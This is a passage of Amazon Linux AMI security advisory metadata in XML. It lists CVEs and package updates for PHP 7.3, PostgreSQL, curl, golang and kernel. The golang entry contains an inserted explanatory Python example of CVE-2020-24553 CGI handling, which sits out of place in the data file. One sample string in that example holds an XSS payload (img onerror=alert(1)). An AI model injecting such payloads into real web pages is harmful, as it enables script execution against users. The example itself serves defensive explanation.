arch="i686"><filename>Packages/php73-gd-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-pdo" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-dbg" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dbg-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-recode" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-recode-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-embedded" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-embedded-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-gmp" version="7.3.23" release="1.29.amzn1" epoch="0" 
arch="i686"><filename>Packages/php73-gmp-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-devel" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-devel-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-dba" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dba-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-opcache" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-opcache-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-fpm" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-fpm-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-mysqlnd" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mysqlnd-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-imap" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-imap-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-process" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-process-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-mbstring" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mbstring-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-debuginfo" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-debuginfo-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-pgsql" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pgsql-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-soap" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-soap-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.23" release="1.29.amzn1" 
epoch="0" arch="i686"><filename>Packages/php73-pdo-dblib-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-json" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-json-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-ldap" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-ldap-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-enchant" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-enchant-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-xmlrpc" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xmlrpc-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-tidy" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-tidy-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-bcmath" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-bcmath-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-odbc" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-odbc-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-cli" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-cli-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-xml" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xml-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-intl" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-intl-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-snmp" version="7.3.23" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/php73-snmp-7.3.23-1.29.amzn1.i686.rpm</filename></package><package name="php73-pspell" version="7.3.23" release="1.29.amzn1" epoch="0" 
arch="i686"><filename>Packages/php73-pspell-7.3.23-1.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1441</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1441: medium priority package update for postgresql94</title><issued date="2020-10-26 18:25:00" /><updated date="2020-10-27 21:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-10208:
A flaw was discovered in postgresql where arbitrary SQL statements can be executed given a suitable SECURITY DEFINER function. An attacker, with EXECUTE permission on the function, can execute arbitrary SQL as the owner of the function.
1734416: CVE-2019-10208 postgresql: TYPE in pg_temp executes arbitrary SQL during SECURITY DEFINER execution
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10208" title="" id="CVE-2019-10208" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql94-devel" version="9.4.26" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-devel-9.4.26-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql94" version="9.4.26" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-9.4.26-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql94-contrib" version="9.4.26" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-contrib-9.4.26-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.26" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-debuginfo-9.4.26-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql94-docs" version="9.4.26" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-docs-9.4.26-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plperl" version="9.4.26" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plperl-9.4.26-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql94-libs" version="9.4.26" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-libs-9.4.26-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql94-server" version="9.4.26" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-server-9.4.26-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.26" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython26-9.4.26-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql94-test" version="9.4.26" release="1.77.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql94-test-9.4.26-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.26" release="1.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython27-9.4.26-1.77.amzn1.x86_64.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.26" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-debuginfo-9.4.26-1.77.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.26" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython27-9.4.26-1.77.amzn1.i686.rpm</filename></package><package name="postgresql94-server" version="9.4.26" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-server-9.4.26-1.77.amzn1.i686.rpm</filename></package><package name="postgresql94-libs" version="9.4.26" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-libs-9.4.26-1.77.amzn1.i686.rpm</filename></package><package name="postgresql94-docs" version="9.4.26" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-docs-9.4.26-1.77.amzn1.i686.rpm</filename></package><package name="postgresql94-test" version="9.4.26" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-test-9.4.26-1.77.amzn1.i686.rpm</filename></package><package name="postgresql94" version="9.4.26" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-9.4.26-1.77.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.26" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython26-9.4.26-1.77.amzn1.i686.rpm</filename></package><package name="postgresql94-contrib" version="9.4.26" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-contrib-9.4.26-1.77.amzn1.i686.rpm</filename></package><package name="postgresql94-devel" version="9.4.26" 
release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-devel-9.4.26-1.77.amzn1.i686.rpm</filename></package><package name="postgresql94-plperl" version="9.4.26" release="1.77.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plperl-9.4.26-1.77.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1442</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1442: medium priority package update for postgresql95</title><issued date="2020-10-26 18:27:00" /><updated date="2020-10-27 21:18:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-14350:
It was found that some PostgreSQL extensions did not use search_path safely in their installation script. An attacker with sufficient privileges could use this flaw to trick an administrator into executing a specially crafted script during the installation or update of such an extension. This affects PostgreSQL versions before 12.4, before 11.9, before 10.14, before 9.6.19, and before 9.5.23.
1865746: CVE-2020-14350 postgresql: Uncontrolled search path element in CREATE EXTENSION
CVE-2019-10208:
A flaw was discovered in postgresql where arbitrary SQL statements can be executed given a suitable SECURITY DEFINER function. An attacker, with EXECUTE permission on the function, can execute arbitrary SQL as the owner of the function.
1734416: CVE-2019-10208 postgresql: TYPE in pg_temp executes arbitrary SQL during SECURITY DEFINER execution
CVE-2019-10130:
PostgreSQL maintains column statistics for tables. Certain statistics, such as histograms and lists of most common values, contain values taken from the column. PostgreSQL does not evaluate row security policies before consulting those statistics during query planning; an attacker can exploit this to read the most common values of certain columns. Affected columns are those for which the attacker has SELECT privilege and for which, in an ordinary query, row-level security prunes the set of rows visible to the attacker.
1707109: CVE-2019-10130 postgresql: Selectivity estimators bypass row security policies
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10130" title="" id="CVE-2019-10130" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10208" title="" id="CVE-2019-10208" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14350" title="" id="CVE-2020-14350" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql95-docs" version="9.5.23" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-docs-9.5.23-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.23" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython27-9.5.23-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql95-libs" version="9.5.23" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-libs-9.5.23-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql95-static" version="9.5.23" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-static-9.5.23-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql95-test" version="9.5.23" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-test-9.5.23-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plperl" version="9.5.23" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plperl-9.5.23-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql95-plpython26" version="9.5.23" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-plpython26-9.5.23-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql95" version="9.5.23" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-9.5.23-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql95-debuginfo" 
version="9.5.23" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-debuginfo-9.5.23-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql95-server" version="9.5.23" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-server-9.5.23-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql95-contrib" version="9.5.23" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-contrib-9.5.23-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql95-devel" version="9.5.23" release="1.81.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql95-devel-9.5.23-1.81.amzn1.x86_64.rpm</filename></package><package name="postgresql95-test" version="9.5.23" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-test-9.5.23-1.81.amzn1.i686.rpm</filename></package><package name="postgresql95-server" version="9.5.23" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-server-9.5.23-1.81.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython26" version="9.5.23" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython26-9.5.23-1.81.amzn1.i686.rpm</filename></package><package name="postgresql95-contrib" version="9.5.23" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-contrib-9.5.23-1.81.amzn1.i686.rpm</filename></package><package name="postgresql95-static" version="9.5.23" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-static-9.5.23-1.81.amzn1.i686.rpm</filename></package><package name="postgresql95-docs" version="9.5.23" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-docs-9.5.23-1.81.amzn1.i686.rpm</filename></package><package name="postgresql95-libs" version="9.5.23" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-libs-9.5.23-1.81.amzn1.i686.rpm</filename></package><package 
name="postgresql95" version="9.5.23" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-9.5.23-1.81.amzn1.i686.rpm</filename></package><package name="postgresql95-debuginfo" version="9.5.23" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-debuginfo-9.5.23-1.81.amzn1.i686.rpm</filename></package><package name="postgresql95-devel" version="9.5.23" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-devel-9.5.23-1.81.amzn1.i686.rpm</filename></package><package name="postgresql95-plpython27" version="9.5.23" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plpython27-9.5.23-1.81.amzn1.i686.rpm</filename></package><package name="postgresql95-plperl" version="9.5.23" release="1.81.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql95-plperl-9.5.23-1.81.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1443</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1443: medium priority package update for postgresql96</title><issued date="2020-10-26 18:29:00" /><updated date="2020-10-27 21:17:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-1720:
A flaw was found in PostgreSQL's "ALTER ... DEPENDS ON EXTENSION", where sub-commands did not perform authorization checks. An authenticated attacker could use this flaw in certain configurations to drop objects such as functions, triggers, and others, leading to database corruption.
1798852: CVE-2020-1720 postgresql: ALTER ... DEPENDS ON EXTENSION is missing authorization checks
CVE-2020-14350:
It was found that some PostgreSQL extensions did not use search_path safely in their installation script. An attacker with sufficient privileges could use this flaw to trick an administrator into executing a specially crafted script during the installation or update of such an extension. This affects PostgreSQL versions before 12.4, before 11.9, before 10.14, before 9.6.19, and before 9.5.23.
1865746: CVE-2020-14350 postgresql: Uncontrolled search path element in CREATE EXTENSION
CVE-2019-10208:
A flaw was discovered in postgresql where arbitrary SQL statements can be executed given a suitable SECURITY DEFINER function. An attacker, with EXECUTE permission on the function, can execute arbitrary SQL as the owner of the function.
1734416: CVE-2019-10208 postgresql: TYPE in pg_temp executes arbitrary SQL during SECURITY DEFINER execution
CVE-2019-10130:
PostgreSQL maintains column statistics for tables. Certain statistics, such as histograms and lists of most common values, contain values taken from the column. PostgreSQL does not evaluate row security policies before consulting those statistics during query planning; an attacker can exploit this to read the most common values of certain columns. Affected columns are those for which the attacker has SELECT privilege and for which, in an ordinary query, row-level security prunes the set of rows visible to the attacker.
1707109: CVE-2019-10130 postgresql: Selectivity estimators bypass row security policies
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10130" title="" id="CVE-2019-10130" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10208" title="" id="CVE-2019-10208" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14350" title="" id="CVE-2020-14350" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1720" title="" id="CVE-2020-1720" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql96" version="9.6.19" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-9.6.19-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql96-test" version="9.6.19" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-test-9.6.19-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql96-docs" version="9.6.19" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-docs-9.6.19-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql96-devel" version="9.6.19" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-devel-9.6.19-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql96-libs" version="9.6.19" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-libs-9.6.19-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql96-static" version="9.6.19" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-static-9.6.19-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql96-server" version="9.6.19" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-server-9.6.19-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.19" release="1.83.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql96-plpython26-9.6.19-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plpython27" version="9.6.19" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plpython27-9.6.19-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.19" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-debuginfo-9.6.19-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql96-plperl" version="9.6.19" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-plperl-9.6.19-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql96-contrib" version="9.6.19" release="1.83.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql96-contrib-9.6.19-1.83.amzn1.x86_64.rpm</filename></package><package name="postgresql96-test" version="9.6.19" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-test-9.6.19-1.83.amzn1.i686.rpm</filename></package><package name="postgresql96" version="9.6.19" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-9.6.19-1.83.amzn1.i686.rpm</filename></package><package name="postgresql96-devel" version="9.6.19" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-devel-9.6.19-1.83.amzn1.i686.rpm</filename></package><package name="postgresql96-docs" version="9.6.19" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-docs-9.6.19-1.83.amzn1.i686.rpm</filename></package><package name="postgresql96-plperl" version="9.6.19" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plperl-9.6.19-1.83.amzn1.i686.rpm</filename></package><package name="postgresql96-static" version="9.6.19" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-static-9.6.19-1.83.amzn1.i686.rpm</filename></package><package name="postgresql96-server" version="9.6.19" 
release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-server-9.6.19-1.83.amzn1.i686.rpm</filename></package><package name="postgresql96-contrib" version="9.6.19" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-contrib-9.6.19-1.83.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython27" version="9.6.19" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython27-9.6.19-1.83.amzn1.i686.rpm</filename></package><package name="postgresql96-debuginfo" version="9.6.19" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-debuginfo-9.6.19-1.83.amzn1.i686.rpm</filename></package><package name="postgresql96-libs" version="9.6.19" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-libs-9.6.19-1.83.amzn1.i686.rpm</filename></package><package name="postgresql96-plpython26" version="9.6.19" release="1.83.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql96-plpython26-9.6.19-1.83.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1444</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1444: low priority package update for curl</title><issued date="2020-11-14 01:22:00" /><updated date="2020-11-16 21:17:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-8231:
A flaw was found in libcurl from versions 7.29.0 through 7.71.1. An application that performs multiple requests with libcurl's multi API, and sets the `CURLOPT_CONNECT_ONLY` option, might experience libcurl using the wrong connection. The highest threat from this vulnerability is to data confidentiality.
1868032: CVE-2020-8231 curl: Expired pointer dereference via multi API with `CURLOPT_CONNECT_ONLY` option set
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8231" title="" id="CVE-2020-8231" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libcurl-devel" version="7.61.1" release="12.95.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.61.1-12.95.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.61.1" release="12.95.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.61.1-12.95.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.61.1" release="12.95.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.61.1-12.95.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="12.95.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.61.1-12.95.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="12.95.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.61.1-12.95.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.61.1" release="12.95.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.61.1-12.95.amzn1.i686.rpm</filename></package><package name="curl" version="7.61.1" release="12.95.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.61.1-12.95.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="12.95.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.61.1-12.95.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1445</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1445: medium priority package update for golang</title><issued date="2020-11-14 01:22:00" /><updated date="2020-11-16 21:17:00" /><severity>medium</severity><description>Package updates are available for Amazon 
Linux AMI that fix the following vulnerabilities:
CVE-2020-24553:
Go before 1.14.8 and 1.15.x before 1.15.1 allows XSS because text/html is the default for CGI/FCGI handlers that lack a Content-Type header.
1874857: CVE-2020-24553 golang: default Content-Type setting in net/http/cgi and net/http/fcgi could cause XSS
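The following is an added example, not code from this advisory or from Go's net/http/cgi package. It models the step a CGI front end performs between the child script's output and the browser: when the script omits Content-Type, the vulnerable behaviour fills in text/html, so any echoed user input is parsed as markup. The sample outputs are constructed; the hardened fallback (text/plain plus nosniff) is this example's choice and is stricter than the upstream fix, which sniffs the body with http.DetectContentType.

```python
# Added example (not code from the Amazon Linux advisory or from Go's
# net/http/cgi): a CGI front end must not assume text/html when the child
# script omits Content-Type. The sample outputs below are constructed.

# A script that echoes a query parameter but never emits a Content-Type header,
# the situation CVE-2020-24553 describes. The echoed value contains angle
# brackets written as escapes, as an attacker-supplied tag would arrive.
SAMPLE_OUTPUT_NO_TYPE = (
    b"Status: 200 OK\r\n"
    b"\r\n"
    b"Hello, \x3cimg src=x onerror=alert(1)\x3e\r\n"
)

# A script that declares its type explicitly; this must be left untouched.
SAMPLE_OUTPUT_WITH_TYPE = (
    b"Content-Type: application/json\r\n"
    b"\r\n"
    b'{"greeting": "Hello"}\r\n'
)


def parse_cgi_output(raw):
    """Split a CGI child's stdout into (headers, body).

    Header names are case-insensitive, so they are stored lower-cased; a
    repeated header keeps its last value. Both CRLF and bare LF separators
    are accepted because scripts are sloppy about line endings.
    """
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        head, sep, body = raw.partition(b"\n\n")
    headers = {}
    for line in head.split(b"\n"):
        line = line.rstrip(b"\r")
        name, colon, value = line.partition(b":")
        if colon and name.strip():
            key = name.strip().lower().decode("latin-1")
            headers[key] = value.strip().decode("latin-1")
    return headers, body


def legacy_content_type(headers):
    """Pre-fix behaviour: a missing Content-Type silently becomes text/html, so
    whatever the script echoed is parsed and scripted by the browser."""
    return headers.get("content-type", "text/html")


def hardened_response_headers(headers):
    """Hardened behaviour chosen for this example (stricter than the upstream
    fix, which sniffs the body with http.DetectContentType): keep an explicit
    Content-Type, otherwise fall back to text/plain, and in every case tell
    the browser not to sniff the body back into HTML."""
    out = dict(headers)
    if "content-type" not in out:
        out["content-type"] = "text/plain; charset=utf-8"
    out["x-content-type-options"] = "nosniff"
    return out
```

The practical check for operators is the inverse: any CGI or FastCGI script that writes user-controlled data should emit an explicit Content-Type, because the front end's default is not something the script author controls.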
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24553" title="" id="CVE-2020-24553" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-docs" version="1.15.3" release="1.63.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.15.3-1.63.amzn1.noarch.rpm</filename></package><package name="golang-race" version="1.15.3" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.15.3-1.63.amzn1.x86_64.rpm</filename></package><package name="golang" version="1.15.3" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.15.3-1.63.amzn1.x86_64.rpm</filename></package><package name="golang-src" version="1.15.3" release="1.63.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.15.3-1.63.amzn1.noarch.rpm</filename></package><package name="golang-misc" version="1.15.3" release="1.63.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.15.3-1.63.amzn1.noarch.rpm</filename></package><package name="golang-tests" version="1.15.3" release="1.63.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.15.3-1.63.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.15.3" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.15.3-1.63.amzn1.x86_64.rpm</filename></package><package name="golang-bin" version="1.15.3" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.15.3-1.63.amzn1.i686.rpm</filename></package><package name="golang" version="1.15.3" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.15.3-1.63.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1446</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1446: important priority package update for 
kernel</title><issued date="2020-11-14 01:22:00" /><updated date="2022-10-27 10:20:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-25211:
